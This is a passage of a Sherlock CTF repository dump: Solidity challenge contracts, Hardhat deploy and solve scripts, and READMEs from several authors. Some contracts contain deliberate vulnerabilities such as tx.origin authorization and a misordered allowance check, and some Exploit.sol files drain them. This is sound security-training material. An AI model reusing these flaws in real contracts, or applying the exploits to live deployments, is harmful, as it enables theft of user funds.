hex"00000000000000000000000000000000000fffff"; 21 | 22 | for (uint256 i; i != 30; ++i) { 23 | if (addr & mask == id) { 24 | return true; 25 | } 26 | mask <<= 4; 27 | id <<= 4; 28 | } 29 | 30 | return false; 31 | } 32 | 33 | function isFunded(address _addr) internal view returns (bool) { 34 | return _addr.balance >= 0.1 ether; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- 
/Thro77le/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // Challenge name: Counterfactual 2 | // Author: Throttle (@_no_handlebars) 3 | 4 | 5 | pragma solidity 0.8.4; 6 | 7 | import "./Factory.sol"; 8 | import "./Challenge.sol"; 9 | 10 | contract Setup { 11 | event Deployed(address); 12 | 13 | Factory public factory; 14 | Challenge public challenge; 15 | 16 | constructor() { 17 | factory = new Factory(); 18 | challenge = new Challenge(address(factory)); 19 | emit Deployed(address(challenge)); 20 | } 21 | 22 | function isSolved() external view returns (bool) { 23 | return challenge.isSolved(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Thro77le/hardhat.config.ts: -------------------------------------------------------------------------------- 1 | import '@nomiclabs/hardhat-waffle'; 2 | import { HardhatUserConfig } from "hardhat/config"; 3 | import "@typechain/hardhat"; 4 | import "@nomiclabs/hardhat-etherscan"; 5 | 6 | require("dotenv").config(); 7 | 8 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 9 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 10 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 11 | 12 | const config: HardhatUserConfig = { 13 | solidity: "0.8.4", 14 | etherscan: { 15 | apiKey: ETHERSCAN_API, 16 | }, 17 | networks: { 18 | goerli: { 19 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 20 | gasPrice: 900000000000, 21 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 22 | }, 23 | }, 24 | typechain: { 25 | outDir: "types", 26 | target: "ethers-v5", 27 | }, 28 | }; 29 | 30 | export default config; 31 | -------------------------------------------------------------------------------- /Thro77le/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Sherlock-CTF-Throttle", 3 | "version": "1.0.0", 4 | "main": 
"index.js", 5 | "repository": "s", 6 | "author": "Thro77le", 7 | "license": "MIT", 8 | "devDependencies": { 9 | "@nomiclabs/hardhat-ethers": "^2.0.3", 10 | "@nomiclabs/hardhat-waffle": "^2.0.1", 11 | "@typechain/hardhat": "^3.0.0", 12 | "@types/chai": "^4.2.22", 13 | "@types/mocha": "^9.0.0", 14 | "@types/node": "^16.11.11", 15 | "chai": "^4.3.4", 16 | "ethereum-waffle": "^3.4.0", 17 | "ethers": "^5.5.2", 18 | "hardhat": "^2.7.0", 19 | "ts-node": "^10.4.0", 20 | "typechain": "^6.0.5", 21 | "typescript": "^4.5.2", 22 | "@typechain/ethers-v5": "^8.0.5", 23 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 24 | "dotenv": "^14.3.2" 25 | }, 26 | "scripts": { 27 | "test-proxy": "hh test test/sherlock.test.ts" 28 | }, 29 | "files": [ 30 | "/contracts" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /Thro77le/scripts/deploy.ts: -------------------------------------------------------------------------------- 1 | import hre from "hardhat"; 2 | import { ethers } from "hardhat"; 3 | 4 | function sleep(seconds: number) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("Challenge", await setup.challenge()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | await sleep(30); 21 | 22 | // verify 23 | await hre.run("verify:verify", { address: setup.address }); 24 | // await hre.run("verify:verify", { address: ctf.address }); 25 | } 26 | 27 | main() 28 | .then(() => process.exit(0)) 29 | .catch((error) => { 30 | console.error(error); 31 | process.exit(1); 32 | }); -------------------------------------------------------------------------------- /Thro77le/scripts/solve.ts: 
-------------------------------------------------------------------------------- 1 | // import ethers from "ethers"; 2 | 3 | // async function main() { 4 | // const SETUP = await ethers.getContractFactory("Setup"); 5 | // const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | // const setup = await SETUP.deploy({ value: ethers.utils.parseEther("1") }); 8 | // const ctf = await ethers.getContractAt( 9 | // "ExampleQuizExploit", 10 | // await setup.instance() 11 | // ); 12 | 13 | // console.log("solved:", await setup.isSolved()); 14 | 15 | // await EXPLOIT.deploy(ctf.address, { value: ethers.utils.parseEther("1") }); 16 | 17 | // console.log("solved:", await setup.isSolved()); 18 | // } 19 | 20 | // main() 21 | // .then(() => process.exit(0)) 22 | // .catch((error) => { 23 | // console.error(error); 24 | // process.exit(1); 25 | // }); -------------------------------------------------------------------------------- /Thro77le/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es2018", 4 | "module": "commonjs", 5 | "strict": true, 6 | "esModuleInterop": true, 7 | "outDir": "dist" 8 | }, 9 | "include": ["./scripts", "./test", "./types"], 10 | "files": ["./hardhat.config.ts"] 11 | } 12 | -------------------------------------------------------------------------------- /WRITEUPS.md: -------------------------------------------------------------------------------- 1 | # Write-ups and solutions 2 | 3 | - tqtsar writeup: https://tqts.ar/post/solving-sherlockctf 4 | - RomiRand solutions: https://github.com/RomiRand/sherlock_ctf_solutions 5 | - Thro77le solutions: https://github.com/Thro77le/Sherlock-CTF 6 | - naps62 solutions: https://github.com/naps62/care-x-sherlock-solutions 7 | - Baraa42 solutions: https://github.com/Baraa42/CTF-solution/tree/main/contracts 8 | - wuwe1 solutions: https://github.com/wuwe1/Sherlock-CTF 9 | - luksgrin solutions: 
https://github.com/luksgrin/Sherlock-CTF 10 | - t-nero solutions: https://github.com/t-nero/sherlock-ctf 11 | -------------------------------------------------------------------------------- /agusduha/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /agusduha/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-agusduha - The King Is Dead Long Live The King 2 | 3 | | Contract | Goerli | 4 | | -------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | CTF Proxy | [0x1020dFFD73141616fa7A931feE757DC9114B79D9](https://goerli.etherscan.io/address/0x1020dFFD73141616fa7A931feE757DC9114B79D9) | 6 | | TheKingIsDeadLongLiveTheKing.sol | [0x4B8df63820cD31D063a160e1C40f8583227591cB](https://goerli.etherscan.io/address/0x4B8df63820cD31D063a160e1C40f8583227591cB) | 7 | | Setup.sol | [0x459D9C80482c541deC1Aa491209EF598BF7c9344](https://goerli.etherscan.io/address/0x459D9C80482c541deC1Aa491209EF598BF7c9344) | 8 | 9 | ## Disclaimer 10 | 11 | The proxy contract is not verified (issues with hardhat-etherscan), but it is an ERC1967Proxy from OpenZeppelin deployed from Setup.sol (also verified). 12 | 13 | The implementation, KingVault (TheKingIsDeadLongLiveTheKing.sol), is verified; you have to use the proxy address as if it were the implementation (calls go to the proxy, which delegates to KingVault). 14 | 15 | The ether to be stolen is in the proxy contract. 16 | 17 | Sorry for the inconvenience!
18 | -------------------------------------------------------------------------------- /agusduha/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /agusduha/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./ISetup.sol"; 5 | import "./TheKingIsDeadLongLiveTheKing.sol"; 6 | import "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol"; 7 | 8 | contract Setup is ISetup { 9 | ERC1967Proxy public instance; 10 | KingVault public kingVault; 11 | bytes public data; 12 | 13 | address constant admin = address(0xDA0); 14 | address constant proposer = address(0xDA2); 15 | address constant king = address(0x0); 16 | 17 | constructor() payable { 18 | require(msg.value == 0.2 ether); 19 | 20 | kingVault = new KingVault(); 21 | 22 | data = abi.encodeWithSelector( 23 | KingVault.initialize.selector, 24 | admin, 25 | proposer, 26 | king 27 | ); 28 | 29 | instance = new ERC1967Proxy{value: 0.2 ether}(address(kingVault), data); 30 | 31 | emit Deployed(address(instance)); 32 | } 33 | 34 | function isSolved() external view override returns (bool) { 35 | return address(instance).balance == 0; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /agusduha/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = 
process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /agusduha/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "4.3.2", 14 | "@openzeppelin/contracts-upgradeable": "4.3.2", 15 | "dotenv": "^14.3.2" 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /agusduha/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = 
require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("0.2") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("KingVault", await setup.instance()); 15 | 16 | const kingVault = await setup.kingVault(); 17 | const setupData = await setup.data(); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf proxy to", ctf.address); 21 | console.log("Deployed ctf implementation to", kingVault); 22 | 23 | // wait for etherscan to index 24 | await sleep(300); 25 | 26 | console.log("Verifying..."); 27 | 28 | // verify 29 | await hre.run("verify:verify", { 30 | address: setup.address, 31 | }); 32 | await hre.run("verify:verify", { 33 | address: kingVault, 34 | }); 35 | await hre.run("verify:verify", { 36 | address: ctf.address, 37 | constructorArguments: [kingVault, setupData], 38 | }); 39 | } 40 | 41 | main() 42 | .then(() => process.exit(0)) 43 | .catch((error) => { 44 | console.error(error); 45 | process.exit(1); 46 | }); 47 | -------------------------------------------------------------------------------- /agusduha/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("0.2") }); 8 | const ctf = await ethers.getContractAt("KingVault", await setup.instance()); 9 | 10 | console.log("solved:", await setup.isSolved()); 11 | 12 | const exploit = await EXPLOIT.deploy(ctf.address); 13 | 14 | await exploit.finalize(); 15 | 16 | console.log("solved:", await 
setup.isSolved()); 17 | } 18 | 19 | main() 20 | .then(() => process.exit(0)) 21 | .catch((error) => { 22 | console.error(error); 23 | process.exit(1); 24 | }); 25 | -------------------------------------------------------------------------------- /bahurum/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | bin 7 | .vscode 8 | 9 | #Hardhat files 10 | cache 11 | artifacts 12 | -------------------------------------------------------------------------------- /bahurum/README.md: -------------------------------------------------------------------------------- 1 | # Inflation CTF submission 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | Inflation.sol | [0x68C3CA33c766cd60E4Af98D697EBd541B4DA7968](https://goerli.etherscan.io/address/0x68c3ca33c766cd60e4af98d697ebd541b4da7968) | 6 | | Setup.sol | [0xABF1f66a9fb48F3f5b75C8A83FB5854A9d906343](https://goerli.etherscan.io/address/0xabf1f66a9fb48f3f5b75c8a83fb5854a9d906343) | 7 | 8 | `.env` file 9 | 10 | ``` 11 | ETHERSCAN_API= 12 | ALCHEMY_API_KEY_GOERLI= 13 | PRIVATE_KEY= 14 | ``` 15 | -------------------------------------------------------------------------------- /bahurum/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './Inflation.sol'; 4 | 5 | contract Exploit { 6 | 7 | Inflation public instance; 8 | InflationaryToken public token; 9 | uint private tokensToBurn; 10 | 11 | constructor(Inflation _instance) { 12 | instance = _instance; 13 | token = InflationaryToken(instance.tokenAddress()); 14 | } 15 | 16 | function finalize() public { 17 | // Since the argument order of _spendAllowance in burnFrom is incorrect 18 | // we can approve an allowance to the challenge contract 
and then burn 19 | // this allowance from the challenge contract balance. 20 | // 10 % of tokens ar minted at each transfer, so we must take it into account 21 | tokensToBurn = token.totalSupply() * (100 + token.rate()) / 100; 22 | token.approve(address(instance), tokensToBurn); 23 | token.burnFrom(address(instance), tokensToBurn); 24 | } 25 | } -------------------------------------------------------------------------------- /bahurum/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /bahurum/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './Inflation.sol'; 5 | 6 | contract Setup is ISetup { 7 | 8 | Inflation public instance; 9 | uint public constant inflationRate = 10; 10 | uint public constant initialSupply = 1000; 11 | 12 | constructor() { 13 | instance = new Inflation(inflationRate, initialSupply); 14 | emit Deployed(address(instance)); 15 | } 16 | 17 | function isSolved() external override view returns (bool) { 18 | return instance.isEmpty(); 19 | } 20 | } -------------------------------------------------------------------------------- /bahurum/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. 
To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 200000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /bahurum/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "^4.5.0", 14 | "dotenv": "^14.3.2" 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /bahurum/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await 
ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "Inflation", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | constructorArguments: [ 32 | await setup.inflationRate(), 33 | await setup.initialSupply() 34 | ] 35 | }); 36 | } 37 | 38 | main() 39 | .then(() => process.exit(0)) 40 | .catch((error) => { 41 | console.error(error); 42 | process.exit(1); 43 | }); 44 | -------------------------------------------------------------------------------- /bahurum/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy(); 8 | const ctf = await ethers.getContractAt( 9 | "Inflation", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | const exploit_instance = await EXPLOIT.deploy(ctf.address); 16 | await exploit_instance.finalize(); 17 | 18 | console.log("solved:", await setup.isSolved()); 19 | } 20 | 21 | main() 22 | .then(() => process.exit(0)) 23 | .catch((error) => { 24 | console.error(error); 25 | process.exit(1); 26 | }); 27 | -------------------------------------------------------------------------------- /band0x/BecomeMaster.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | const main = async () => 
{ 4 | 5 | const setupFactory = await hre.ethers.getContractFactory("Setup"); 6 | const setupContract = await setupFactory.deploy({ value: parseEther("0.001") }); 7 | await setupContract.deployed(); 8 | console.log("Setup addy:", setupContract.address); 9 | console.log("Challenge Instance,", await setupContract.instance()); 10 | 11 | 12 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "Exploit", 16 | await setupContract.instance() 17 | ); 18 | 19 | console.log("solved:", await setupContract.isSolved()); 20 | 21 | await EXPLOIT.deploy(ctf.address, { value: parseEther("0.001") }); 22 | 23 | console.log("solved:", await setupContract.isSolved()); 24 | 25 | 26 | }; 27 | 28 | 29 | 30 | const runMain = async () => { 31 | try { 32 | await main(); 33 | process.exit(0); 34 | } catch (error) { 35 | console.log(error); 36 | process.exit(1); 37 | } 38 | }; 39 | 40 | runMain(); 41 | -------------------------------------------------------------------------------- /band0x/BecomeMaster.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | contract BecomeMaster { 5 | 6 | mapping (address => uint) allocations; 7 | address public admin; 8 | address public master; 9 | address caller; 10 | 11 | constructor() payable { 12 | master = msg.sender; 13 | } 14 | 15 | modifier onlyMaster { 16 | require( 17 | master == tx.origin, 18 | "caller is not the master" 19 | ); 20 | _; 21 | } 22 | modifier onlyContract { 23 | require( 24 | msg.sender != tx.origin, 25 | "caller is not the master" 26 | ); 27 | _; 28 | } 29 | modifier onlyAdmin { 30 | require( 31 | admin == tx.origin, 32 | "caller is not the Admin" 33 | ); 34 | _; 35 | } 36 | 37 | function allocate() public payable { 38 | allocations[caller] = allocations[caller] += (msg.value); 39 | admin = tx.origin; 40 | } 41 | 42 | function sendAllocation(address payable 
allocator) public { 43 | require(allocations[allocator] > 0); 44 | allocator.transfer(allocations[allocator]); 45 | } 46 | 47 | 48 | function takeMasterRole() public onlyAdmin onlyContract 49 | { 50 | master = admin; 51 | } 52 | 53 | function collectAllocations() public onlyMaster onlyContract { 54 | payable(msg.sender).transfer(address(this).balance); 55 | } 56 | 57 | function allocatorBalance(address allocator) public view returns (uint) { 58 | return allocations[allocator]; 59 | } 60 | 61 | } 62 | -------------------------------------------------------------------------------- /band0x/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | import './BecomeMaster.sol'; 5 | 6 | contract Exploit { 7 | constructor(BecomeMaster instance) payable { 8 | require(msg.value == 0.001 ether); 9 | instance.allocate{value: 0.001 ether}(); 10 | instance.takeMasterRole(); 11 | instance.collectAllocations(); 12 | } 13 | 14 | function finalize() external { 15 | // can be used to finalize the exploit patten 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /band0x/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /band0x/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-band0x 2 | CTF of band0x 3 | 4 | # The key to passing this test is in becoming a master. Can you become a master and drain the funds? 
5 | 6 | GOERLI LINKS: 7 | 8 | [Setup.sol](https://goerli.etherscan.io/address/0x46C9489797c5647F850dD3A5bcB13C240bcd383A) 9 | [BecomeMaster.sol](https://goerli.etherscan.io/address/0xD2034a50C5Adc8A190D4f8c8EE18643Ab8A0ff05) 10 | 11 | Note ** Hardhat js file for deployment in repo. Same script also deploys and solves with Exploit.sol, not sure if required or not. 12 | -------------------------------------------------------------------------------- /band0x/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | import './ISetup.sol'; 4 | import './BecomeMaster.sol'; 5 | 6 | contract Setup is ISetup { 7 | BecomeMaster public instance; 8 | address ORIGINAL_MASTER; 9 | 10 | constructor() payable { 11 | require(msg.value == 0.001 ether); 12 | instance = new BecomeMaster{value: 0.001 ether}(); 13 | emit Deployed(address(instance)); 14 | ORIGINAL_MASTER = instance.master(); 15 | instance.allocate(); 16 | } 17 | 18 | function isSolved() external override view returns (bool) { 19 | return instance.master() != ORIGINAL_MASTER && address(instance).balance == 0; 20 | 21 | } 22 | 23 | } 24 | -------------------------------------------------------------------------------- /chaboo/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /chaboo/README.md: -------------------------------------------------------------------------------- 1 | # SwissTreasury CTF submission 2 | 3 | Your goal is to extract funds deposited within SwissTreasury contract. Nothing is secure even when it seems so. 
4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | SwissTreasury.sol | [0x014D1921A1237b6e8fF3FA960333329667F7e242](https://goerli.etherscan.io/address/0x014D1921A1237b6e8fF3FA960333329667F7e242) | 8 | | Setup.sol | [0x0a73CA730FaF56126487196a4B7E10B2A9B3df67](https://goerli.etherscan.io/address/0x0a73CA730FaF56126487196a4B7E10B2A9B3df67) | 9 | 10 | ## Local setup requires 11 | 12 | `.env` file 13 | 14 | ``` 15 | ETHERSCAN_API= 16 | ALCHEMY_API_KEY_GOERLI= 17 | PRIVATE_KEY= 18 | ``` 19 | -------------------------------------------------------------------------------- /chaboo/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /chaboo/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import './ISetup.sol'; 5 | import './SwissTreasury.sol'; 6 | 7 | contract Setup is ISetup { 8 | SwissTreasury public instance; 9 | 10 | constructor() payable { 11 | require(msg.value == 1 ether); 12 | 13 | address[] memory proposers = new address[](0); 14 | address[] memory executors = new address[](1); 15 | executors[0] = address(0); 16 | 17 | instance = new SwissTreasury{value: 1 ether}(1 days, proposers, executors); 18 | 19 | emit Deployed(address(instance)); 20 | } 21 | 22 | function isSolved() external override view returns (bool) { 23 | return address(instance).balance == 0; 24 | } 25 | } -------------------------------------------------------------------------------- 
/chaboo/contracts/SwissTreasury.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | // NOTE(review): this project's package.json pins @openzeppelin/contracts to 4.3.0; check that release against OpenZeppelin's published TimelockController security advisories before reusing this pattern. 4 | import "@openzeppelin/contracts/governance/TimelockController.sol"; 5 | /// @notice Treasury built on OpenZeppelin's TimelockController; the payable constructor forwards minDelay, proposers and executors to it. 6 | contract SwissTreasury is TimelockController { 7 | 8 | event DistributeFundsExecuted(address indexed target, uint256 value); 9 | 10 | constructor(uint256 minDelay, address[] memory proposers, address[] memory executors) 11 | payable 12 | TimelockController(minDelay, proposers, executors) 13 | {} 14 | /// @dev Reverts unless msg.sender is this contract, so it is presumably reachable only through an operation executed by the inherited timelock (confirm); sends `value` wei to `target` with a low-level call and reverts if that call fails. 15 | function distributeFunds(address target, uint256 value) external { 16 | require(msg.sender == address(this), "caller must be treasury"); 17 | 18 | (bool success, ) = target.call{value: value}(""); 19 | require(success, "Treasury: distribute failed"); 20 | 21 | emit DistributeFundsExecuted(target, value); 22 | } 23 | } -------------------------------------------------------------------------------- /chaboo/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "4.3.0", 14 | "dotenv": "^14.3.2" 15 | }, 16 | "scripts": { 17 | "chain": "hardhat node --network hardhat", 18 | "compile": "hardhat compile", 19 | "test": "hardhat test --network hardhat", 20 | "accounts": "hardhat accounts", 21 | "balance": "hardhat balance", 22 | "deploy-locally": "node scripts/hardhat/deploy.js", 23 | "deploy-goerly": "node scripts/goerly/deploy.js" 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/arguments.js: 
-------------------------------------------------------------------------------- 1 | module.exports = [ 2 | 86400, 3 | [], 4 | ["0x0000000000000000000000000000000000000000"] 5 | ]; 6 | 7 | // npx hardhat verify --constructor-args scripts/goerli/arguments.js 0x014D1921A1237b6e8fF3FA960333329667F7e242 8 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | await sleep(300); 21 | 22 | // verify 23 | await hre.run("verify:verify", { 24 | address: setup.address, 25 | }); 26 | await hre.run("verify:verify", { 27 | address: ctf.address, 28 | }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/verify.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = 